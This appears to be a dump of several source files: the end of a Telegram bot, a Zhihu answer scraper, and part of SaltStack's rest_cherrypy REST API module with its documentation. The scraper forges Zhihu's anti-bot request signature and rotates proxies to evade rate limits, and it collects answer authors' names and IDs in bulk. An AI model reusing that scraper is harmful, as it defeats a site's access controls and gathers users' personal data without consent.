help_funcs_handler = CallbackQueryHandler(h_for_funcs, pattern=r"h_")
help_handler = CallbackQueryHandler(help_button, pattern=r"help")
back_btn_handler = CallbackQueryHandler(back_btn, pattern=r"back_btn")
dp.add_handler(restart_handler)
dp.add_handler(start_handler)
dp.add_handler(help_funcs_handler)
dp.add_handler(help_handler)
dp.add_handler(back_btn_handler)
LOG.info("%s", BANNER)
# Start the bot.
updater.start_polling(timeout=15, read_latency=4)
updater.idle()
if __name__ == "__main__":
main()
|
zhihu_answer.py
|
import requests
import json
import re
import threading
import time
import os
import hashlib
import execjs
from spider.ProxyPool import Proxy_pool
class zhihu_answer():
question_id = 0
begin_id = 0
similar_question_url_list = []
copy_list = []
question_count = 20
proxy_pool = Proxy_pool()
def __init__(self, begin_id, question_id, question_count=20):
self.cookie = ''
self.begin_id = begin_id
self.question_id = question_id
self.question_count = question_count
self.header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
"cookie": self.cookie
}
def get_headers(self, api_url):
star = 'd_c0='
end = ';'
if self.cookie == "":
raise Exception("请在22行输入cookie")
cookie_mes = self.cookie[self.cookie.index(star):].replace(star, '')
cookie_mes = cookie_mes[:cookie_mes.index(end)]
parse_url = api_url.replace("https://www.zhihu.com", "")
f = "+".join(["101_3_2.0", parse_url, cookie_mes])
fmd5 = hashlib.new('md5', f.encode()).hexdigest()
with open(os.path.dirname(__file__) + os.sep + 'g_encrypt.js', 'r', encoding="utf-8") as f:
ctx1 = execjs.compile(f.read(), cwd=os.path.dirname(os.getcwd()) + os.sep + 'node_modules')
encrypt_str = "2.0_%s" % ctx1.call('b', fmd5)
self.header["x-app-za"] = 'OS=Web'
self.header["x-zse-93"] = "101_3_2.0"
self.header["x-zse-96"] = encrypt_str
# print(self.header["x-zse-96"])
return self.header
def get_answer(self, question_id, limit=1):
now = 0
total_num = self.get_total(question_id)
limit = min(total_num, limit)
content_list = []
author_name_list = []
author_id_list = []
author_url_token_list = []
dict = {}
for i in range(0, total_num // limit):
url = "https://www.zhihu.com/api/" \
"v4/questions/{question_id}/answers?include=data%5B*%5D." \
"is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset={now}&limit={limit}&sort_by=default&platform=desktop".format(
question_id=str(question_id), limit=limit, now=now)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
data = json_result["data"]
print("\r爬取进度:" + str(round(i / (total_num // limit) * 100, 2)) + "%", end="", flush=True)
for i in data:
content_list.append(i["content"])
author_name_list.append(i['author']['name'])
author_id_list.append(i['author']['id'])
author_url_token_list.append(i['author']['url_token'])
now = now + limit
dict["content_list"] = content_list
dict["author_name_list"] = author_name_list
dict["author_id_list"] = author_id_list
dict["author_url_token_list"] = author_url_token_list
return dict
def get_total(self, question_id):
# time.sleep(1)
url = "https://www.zhihu.com/api/" \
"v4/questions/{question_id}/answers?include=data%5B*%5D." \
"is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset=&limit={limit}&sort_by=default&platform=desktop".format(
question_id=str(question_id), limit=20)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
next_json = json_result
total_num = next_json['paging']['totals']
return total_num
def format_content(self, content_list):
text_list = []
pre = re.compile('>(.*?)<')
for i in content_list:
text = ''.join(pre.findall(i))
text_list.append(text)
return text_list
def get_question_title(self, question_id):
url = f"https://www.zhihu.com/api/v4/questions/{question_id}/answers?" \
"include=data%5B*%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset=0&limit=3&sort_by=default&platform=desktop"
# print(url)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
data = json_result["data"]
title = data[0]['question']['title']
return title
def single_answer(self, question_id):
question_title = self.get_question_title(question_id)
print("全部回答数量:" + str(self.get_total(question_id)))
print("爬取的问题:" + question_title + "——问题id为:" + str(question_id))
print("爬取ing.....请等待,等待时间依据回答数量而定")
try:
result_dict = self.get_answer(question_id, limit=20)
# self.get_answer(question_id)
text_list = self.format_content(result_dict['content_list'])
result_path = os.path.dirname(os.getcwd()) + os.sep + "result"
if not os.path.exists(result_path):
os.mkdir(result_path)
with open(os.path.dirname(os.getcwd()) + os.sep + "result" + os.sep + question_title + ".txt", mode="w",
encoding='utf-8') as f:
f.write("问题:" + question_title + "\n")
f.write("问题id:" + str(question_id) + "\n\n")
for i in range(0, len(text_list)):
f.write("回答者id:" + result_dict["author_id_list"][i] + "\n")
f.write("回答者空间地址:" + result_dict["author_url_token_list"][i] + "\n")
f.write("回答者昵称:" + result_dict["author_name_list"][i] + "\n")
f.write("回答的内容:" + text_list[i] + "\n\n")
f.close()
except:
pass
finally:
print("\n爬取完成")
def get_next_question(self, question):
url = "https://www.zhihu.com/api/v4/questions/{question_id}/similar-questions?include=data%5B*%5D.answer_count%2Cauthor%2Cfollower_count&limit=5".format(
question_id=question)
# print(url)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
# print(response.text)
json_result = json.loads(response.content)
url_list = json_result['data']
# with open("questions_id.txt", mode="a", encoding='utf-8') as f:
for i in url_list:
if not self.copy_list.__contains__(i['id']):
self.similar_question_url_list.append(i['id'])
self.copy_list.append(i['id'])
# self.copy_list.append(i['id'])
# f.write(str(i['id'])+"\n")
print(i['id'])
if len(self.copy_list) >= self.question_count:
return
self.get_parse_question()
# return self.similar_question_url_list
# f.close()
def get_parse_question(self):
for i in self.similar_question_url_list:
try:
self.get_next_question(i)
self.similar_question_url_list.remove(i)
except:
pass
if len(self.copy_list) >= self.question_count:
return
def download_all_similar_question(self):
threads = []
if len(self.copy_list) >= self.question_count:
for i in self.copy_list:
time.sleep(1)
th = threading.Thread(target=self.single_answer, args=(i,))
# print(th.name)
th.start()
threads.append(th)
for th in threads:
th.join()
elif (len(self.copy_list) == 0):
self.get_next_question(self.begin_id)
self.download_all_similar_question()
else:
self.get_next_question(self.copy_list[len(self.copy_list) - 1])
self.download_all_similar_question()
if __name__ == '__main__':
model = input("请输入想要选取的模式:1.爬取单个问题 2.爬取相关问题(由于知乎速率限制问题,这里将线程间隔时间设为1s【或采用高匿名代理】)\n")
id = input("请输入想要爬取的问题的id,或相关问题的起点问题的id:\n")
if int(model) == 1:
zhihu = zhihu_answer(id, id)
zhihu.single_answer(id)
elif int(model) == 2:
count = input("请输入想要爬取的相关问题的个数(默认为20,最大为400,知乎超过500会有反爬验证,可以设置ip代理解决):\n")
try:
count = int(count)
except:
print("输入非数字,默认20开始爬取")
count = 20
zhihu = zhihu_answer(id, id, count)
zhihu.download_all_similar_question()
else:
print("请输入规范数字1或2")
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://github.com/cherrypy/cherrypy/issues/1298>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionaddedd:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionaddedd:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy # pylint: disable=3rd-party-module-not-gated
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
if six.PY3:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
entity.fp.read(fp_out=contents)
contents.seek(0)
body_str = contents.read()
body_bytes = salt.utils.to_bytes(body_str)
body_bytes = six.BytesIO(body_bytes)
body_bytes.seek(0)
# Patch fp
entity.fp = body_bytes
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
